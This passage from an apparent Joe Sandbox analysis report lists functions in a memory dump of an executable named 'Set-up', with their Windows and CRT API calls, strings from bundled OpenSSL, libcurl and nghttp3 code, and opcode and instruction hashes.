                                • Opcode Fuzzy Hash: d8c1b3940f5325ac0216dacfbd218614da8967f1274936c00028ed3eaf688162
                                • Instruction Fuzzy Hash: F52138B6B64209B6D62025286C03F7FA706CBD6B65F18013AFF0C661C3E9D968294995
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,002F2BF4,00000008), ref: 002F22C1
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,002F2BF4,00000008), ref: 002F2312
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: memcpymemset
                                • String ID: copy_integer$crypto/params.c$general_set_uint
                                • API String ID: 1297977491-3191580373
                                • Opcode ID: 029bb4ed8e212abee304fcceefd5b10f348f740bf839ad5cb3cda28bf42796a1
                                • Instruction ID: 0effe36ddb4cdad01c84e22cbc6b5365cf7b20ac13fa884da009dfa7b7340376
                                • Opcode Fuzzy Hash: 029bb4ed8e212abee304fcceefd5b10f348f740bf839ad5cb3cda28bf42796a1
                                • Instruction Fuzzy Hash: BE214FB0B38309ABEB3099649C42F3AF748DBD7744F14017EFE05961C3D5D9AC684661
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,002F2075,?,?,?,?,?,?,002F2704,00000008), ref: 002F40C1
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,002F2075,?,?,?,?,?,?,002F2704,00000008), ref: 002F411E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcpystrlen$memcpymemset
                                • String ID: copy_integer$crypto/params.c$unsigned_from_signed
                                • API String ID: 2323844366-3781254518
                                • Opcode ID: 94d823da53b08afc3fc678061bf839130548856f2a585cc6d07baf76bd42a897
                                • Instruction ID: ef84f2234de3d16b2b6601dd9dc11ddf15f75b860ecd6a166fb979810014bba4
                                • Opcode Fuzzy Hash: 94d823da53b08afc3fc678061bf839130548856f2a585cc6d07baf76bd42a897
                                • Instruction Fuzzy Hash: 6B012DA1B6431536E63076647C03F7B6B48CFE1B55F18053DFB08A61C3E5D9687846A2
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0070B19C,nghttp3_qpack.c,00000811,?,?), ref: 001BE866
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,001C077F,?,?,00000000,00000000), ref: 001BE87B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
                                • API String ID: 1222420520-1270044496
                                • Opcode ID: 9f2aeeb7bfeadba3305173f54e57cfd276d92dc483f60fb0742abff54db4d213
                                • Instruction ID: 737c58d8325e6a6a06008d40c3686838c7b71220757563fbfa2f25a484fbd2c3
                                • Opcode Fuzzy Hash: 9f2aeeb7bfeadba3305173f54e57cfd276d92dc483f60fb0742abff54db4d213
                                • Instruction Fuzzy Hash: 2481C2B5A00A019FD710DF24D842AA6B7F5FF59718F08462CF88A87752EB31F855CB91
                                APIs
                                • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(001154E6), ref: 00118235
                                • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 001182D4
                                • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 001182E1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strrchr$_stat64
                                • String ID: mime.c
                                • API String ID: 2771713950-3378952128
                                • Opcode ID: c22abce8ce1b2eb9130c834a98cbd390efdc72c1e7ea2ca8ad7b57be057f71bc
                                • Instruction ID: 971523fcb0c46e2b027a2fd5d157fe99770e1b65dd0db33cca5cd214dae7c5b6
                                • Opcode Fuzzy Hash: c22abce8ce1b2eb9130c834a98cbd390efdc72c1e7ea2ca8ad7b57be057f71bc
                                • Instruction Fuzzy Hash: BA51E6B1A113009BEB189F14CC867973AA5AF50714F184138EC289F2C6EFB5CA858795
                                APIs
                                • htons.WS2_32(?), ref: 001543D8
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00154409
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00154457
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: htonsmemcpystrlen
                                • String ID: curl_addrinfo.c
                                • API String ID: 2973076469-1838508774
                                • Opcode ID: 8c7a403375dd48fed1d70aa6bdfd0c31cb49c62ac8410a7bb85040863c64d571
                                • Instruction ID: 11e67a168167926f50b0cf06b4b20ddef5aa0ca22b9840a315163f1d470ba6bf
                                • Opcode Fuzzy Hash: 8c7a403375dd48fed1d70aa6bdfd0c31cb49c62ac8410a7bb85040863c64d571
                                • Instruction Fuzzy Hash: 624187B5A04705EFD700DF59C880A6AB7E4FF88318F04892DED998B361E330E994CB91
                                APIs
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 0014665D
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0014670E
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 0014671C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$_time64
                                • String ID: altsvc.c
                                • API String ID: 2413861649-3234676706
                                • Opcode ID: 4e6087b02812d75a93de9637e31e6f8a3ee4e8b0d2a9888d490808da30162474
                                • Instruction ID: 3c0d3c035f9818b3014c547e962edcf15d61606cde6c0f3ddb67fa2d513c8130
                                • Opcode Fuzzy Hash: 4e6087b02812d75a93de9637e31e6f8a3ee4e8b0d2a9888d490808da30162474
                                • Instruction Fuzzy Hash: A131F7B1E08300ABD710EE24AC8296F7BE5AB5575CF054439FD0D9A262F731ED44C693
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 001B435F
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 001B43EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                                • API String ID: 1222420520-4133914617
                                • Opcode ID: b3441983fd29682457af571cdc099d6fc5b8ada999243d1ea18e96384e4e3211
                                • Instruction ID: 6d0c19527b1f4fab4a160807412d48c049ce74b28fd8cc6a0ce154ec2a7afd34
                                • Opcode Fuzzy Hash: b3441983fd29682457af571cdc099d6fc5b8ada999243d1ea18e96384e4e3211
                                • Instruction Fuzzy Hash: 4131B172500215AFE7129F54EC09FDA37E9BF66319F0904B4E9449B1A3E736D428C7A1
                                APIs
                                • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,001B70DF,00000001,?,?,?), ref: 001BA0E5
                                  • Part of subcall function 001BA140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 001BA29A
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,001B70DF,00000001,?,?,?), ref: 001BA135
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assertmemcpymemmove
                                • String ID: ksl->head$nghttp3_ksl.c
                                • API String ID: 374949274-2784241221
                                • Opcode ID: c9b1a95330e29618407a7e7470bfa1f26d6e7ff0e7a9c6ede211fac261919889
                                • Instruction ID: bdc8599e780f20e163087341742f0142d9161d8a296d878062821dc17855877c
                                • Opcode Fuzzy Hash: c9b1a95330e29618407a7e7470bfa1f26d6e7ff0e7a9c6ede211fac261919889
                                • Instruction Fuzzy Hash: F21193702002059FDB049F09D88199AFBA6FFC5314F58C66EE9094B642D335EC44CBA2
                                APIs
                                • getsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0014893B
                                • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00148960
                                  • Part of subcall function 00137620: GetModuleHandleA.KERNEL32(ntdll), ref: 0013763F
                                  • Part of subcall function 00137620: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 0013764B
                                  • Part of subcall function 00137620: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,0000010C), ref: 00137695
                                  • Part of subcall function 00137620: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 001376D3
                                  • Part of subcall function 00137620: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 001376DA
                                  • Part of subcall function 00137620: VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 001376E4
                                  • Part of subcall function 00137620: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 001376EB
                                  • Part of subcall function 00137620: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 001376FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ConditionMask$AddressHandleModuleProcgetsockoptmemsetsetsockopt
                                • String ID: @$ @
                                • API String ID: 2103437208-1089145642
                                • Opcode ID: 4adbd8b38699f0e619745c20533256a9e28d17874b622fcd51b686cfe2b362ce
                                • Instruction ID: 695bff31779df5e6c7e414f23015dfb93ad728edc1aea6f74c459261f4c7a4c3
                                • Opcode Fuzzy Hash: 4adbd8b38699f0e619745c20533256a9e28d17874b622fcd51b686cfe2b362ce
                                • Instruction Fuzzy Hash: 050180B15087429BF7109F14ED4A7BE77E4BF81708F01452CEA846A2E1E7B58988C782
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,FFC0BFFA,?), ref: 00238A9A
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000001,?,?), ref: 00238AEA
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00238BD7
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00238C2B
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00238E63
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: 3a6de16d7b1b34158d5e2fb7dcd18fa41187bef40189692985b0b84542096435
                                • Instruction ID: 2645e83d04c6c575a7313cf8c4b95e2c0318b2546fb96d842e8e4e149f26c2c1
                                • Opcode Fuzzy Hash: 3a6de16d7b1b34158d5e2fb7dcd18fa41187bef40189692985b0b84542096435
                                • Instruction Fuzzy Hash: 0DF195F2A107128FDB18CF18C59075ABBA6FF84314F18C56DE9498B399DB74E865CB80
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0013C685
                                  • Part of subcall function 001173F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0011CA95,006E9AB8,00000467,mprintf.c), ref: 0011741D
                                  • Part of subcall function 001173F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00117445
                                  • Part of subcall function 001173F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,0011CA95,006E9AB8,00000467,mprintf.c), ref: 00117486
                                  • Part of subcall function 001173F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 001174AA
                                  • Part of subcall function 001173F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001174B2
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0013C6CF
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0013C719
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy$__acrt_iob_func_errnofflushstrlen
                                • String ID: vtls/vtls.c
                                • API String ID: 1294796744-169717415
                                • Opcode ID: 98ff3c13854f66eb8752d69febc138158881d1c399fd1343e04ae6dfacf8fc85
                                • Instruction ID: ab09f8d70628128a0da0ef098b4d788927d2964e1f9a17fdeb7437b510e73f36
                                • Opcode Fuzzy Hash: 98ff3c13854f66eb8752d69febc138158881d1c399fd1343e04ae6dfacf8fc85
                                • Instruction Fuzzy Hash: 74A160B0B017039BD7208F6AD845B12B7E8BF64744F094539E958EB782FB71E950CB90
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 0029E9A3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: $BN_lshift$crypto/bn/bn_shift.c
                                • API String ID: 2221118986-2228461501
                                • Opcode ID: 080ebe42fddff454f790b5504d7780b8e5320f8587f8c772cfa2e6efa3d80f19
                                • Instruction ID: 5aa7a5dd4910dd87a9b7ee7e01c4a34897038a35f8b63c34a6979305e57b1690
                                • Opcode Fuzzy Hash: 080ebe42fddff454f790b5504d7780b8e5320f8587f8c772cfa2e6efa3d80f19
                                • Instruction Fuzzy Hash: 1D710071A187118BDB14DF29C88062AF7A5AFDA310F098B2EFDA967391D770AC11CB41
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,002C05BF,00000000,00000000,input), ref: 00314986
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,?), ref: 003149D4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpystrlen
                                • String ID: crypto/property/property_string.c$ossl_property_string
                                • API String ID: 3412268980-3682758481
                                • Opcode ID: c7c8cd73263460bfe58bccc08d470332d972f947cd773b903f7dbfba8b1c6479
                                • Instruction ID: c538abf817789cbc68704ddeab6b5ad3fe3e64dd73fcc7c274a0894c3bfe4a7f
                                • Opcode Fuzzy Hash: c7c8cd73263460bfe58bccc08d470332d972f947cd773b903f7dbfba8b1c6479
                                • Instruction Fuzzy Hash: 415108B6E942056BD712BB64EC03F6B76985F14748F090038FD48A2253FB65EA70CB92
                                APIs
                                • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0030662C
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcpystrlen$memcmp
                                • String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
                                • API String ID: 1653033214-3047229099
                                • Opcode ID: 0bc38fd293d5101b5ae6121e5bb41e501beafafc381f243bd3c3f897c754e017
                                • Instruction ID: 663b6252eff4912861072906c5348ee4319b29c086946796c35d17dfe926394b
                                • Opcode Fuzzy Hash: 0bc38fd293d5101b5ae6121e5bb41e501beafafc381f243bd3c3f897c754e017
                                • Instruction Fuzzy Hash: 8B4167E5B453003BEA2236702C97F6B310C4F50758F140638FE099D2C7FAA6DA348AA7
                                APIs
                                • EnterCriticalSection.KERNEL32(?), ref: 001D8769
                                • SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 001D87D1
                                  • Part of subcall function 001D88B0: QueryPerformanceFrequency.KERNEL32(?), ref: 001D88C1
                                  • Part of subcall function 001D88B0: QueryPerformanceCounter.KERNEL32(?), ref: 001D88CC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
                                • String ID:
                                • API String ID: 3112449238-0
                                • Opcode ID: 6de7a39156943b0c48857361634e7b23079e38c2e4eaf884b08febc66da285e0
                                • Instruction ID: d889e57276539f3a7e512fa59b390b395e7ffffacdc0638e56eb89f9cc107acb
                                • Opcode Fuzzy Hash: 6de7a39156943b0c48857361634e7b23079e38c2e4eaf884b08febc66da285e0
                                • Instruction Fuzzy Hash: 0C31F8B2B00201ABEB089A31DC85B6BB6A8BB90340F54453DEC16D7291DF31FD14D7A1
                                APIs
                                • GetLastError.KERNEL32(002C7CCC,?,00000000,002C7127,002C7CCC,00000000,002ECAB7,00111A70), ref: 002C60E3
                                • SetLastError.KERNEL32(00000000), ref: 002C61A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLast
                                • String ID: crypto/err/err.c$crypto/err/err_local.h
                                • API String ID: 1452528299-2963546075
                                • Opcode ID: c408cb7f1a97827ccbe60df78e020c7034ae734270c146243c8d45301c0b67a9
                                • Instruction ID: b63893b857e41d0c397527f92ce2008d3ac0657c95eeac02ab316f5d53baea03
                                • Opcode Fuzzy Hash: c408cb7f1a97827ccbe60df78e020c7034ae734270c146243c8d45301c0b67a9
                                • Instruction Fuzzy Hash: CB31F4B1AA430336E6211F68BC0BFA57700BB8475DF540328FE14652D3E7A56834CE92
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008,?,00000008,?,?,?,?,?,?,?,0033066D,?,?,?), ref: 002A0AAD
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcpystrlen$memset
                                • String ID: BUF_MEM_grow_clean$crypto/buffer/buffer.c
                                • API String ID: 2970985887-4138242688
                                • Opcode ID: 2012fab889d0d96b7e281a4c766161d324744de34888560a556a17484deee94b
                                • Instruction ID: 3121de4357a23965b317ce72b7876187c44dbe9da42b04083f578b8893799280
                                • Opcode Fuzzy Hash: 2012fab889d0d96b7e281a4c766161d324744de34888560a556a17484deee94b
                                • Instruction Fuzzy Hash: BF31FF71B74301ABDB109E24DDC6F2A7B989F42714F088529F94D9F2C7EAA4DC248671
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,002871DD,00000000,?,?), ref: 002844AC
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 002844FF
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$strcpy$memcpy
                                • String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
                                • API String ID: 1223016426-1431402185
                                • Opcode ID: eb9212d0c83990cddd6f8eaeb89ad63303e954e6fd16c7bcca5353419998a0d9
                                • Instruction ID: d50dd9b97093fd148e5e588893c260f09101abe78345a6e3cbc1dddb553899d5
                                • Opcode Fuzzy Hash: eb9212d0c83990cddd6f8eaeb89ad63303e954e6fd16c7bcca5353419998a0d9
                                • Instruction Fuzzy Hash: 30119BB9A553165BDB207D648C41F2FB3989BA0714F15022DFD199B3C2EAA4DC2087F2
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 001BC4E7
                                Strings
                                • (size_t)(p - pbuf->last) == len, xrefs: 001BC4E2
                                • nghttp3_qpack.c, xrefs: 001BC4DD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
                                • API String ID: 1222420520-3384106985
                                • Opcode ID: f6d7c60ef1ebcdcabd90c146323bcc0b0af0b8525a65f71d30a2ab8f66b3d9aa
                                • Instruction ID: 6b9539957a26bd9a2270b8f8f75e521c6f233686cefa999157af4b294ce050b3
                                • Opcode Fuzzy Hash: f6d7c60ef1ebcdcabd90c146323bcc0b0af0b8525a65f71d30a2ab8f66b3d9aa
                                • Instruction Fuzzy Hash: 3481C171A083009FD7089E2CC89076AB7D2AB99714F59867CE8998B3E2D735DC4887C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7a3e4f79732f4f03d5c7eb3a3425ee62786d9e1b53039b8f6863c2d7f0731408
                                • Instruction ID: 7552d8c3df1a17eb1356240d9973131549f85ea866f42281fc7673890e8c8546
                                • Opcode Fuzzy Hash: 7a3e4f79732f4f03d5c7eb3a3425ee62786d9e1b53039b8f6863c2d7f0731408
                                • Instruction Fuzzy Hash: 6DD1E2B2518305BFDB04AF58DC41E6BBBA9EFC4344F49482CF94547222E671ED24CBA2
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,001BB434,?,?,00000000,00000000,?,?), ref: 001BC68A
                                Strings
                                • (size_t)(p - rbuf->last) == len, xrefs: 001BC685
                                • nghttp3_qpack.c, xrefs: 001BC680
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
                                • API String ID: 1222420520-2159148421
                                • Opcode ID: 9f2bc6f76071b16a5a0087cab5953eacb3eeaedefad8bb39d09ba18642357a84
                                • Instruction ID: 4433eeb700a166e8940d7e57edac30dfd585c336cd87ff8cf94ad565c71cb01d
                                • Opcode Fuzzy Hash: 9f2bc6f76071b16a5a0087cab5953eacb3eeaedefad8bb39d09ba18642357a84
                                • Instruction Fuzzy Hash: E941F671B083005FD7099A28D890BAAB7D6EFD9314F18867DE989CB392EB35DD05C781
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 001C27D1
                                Strings
                                • nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 001C27CC
                                • nghttp3_qpack.c, xrefs: 001C27C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
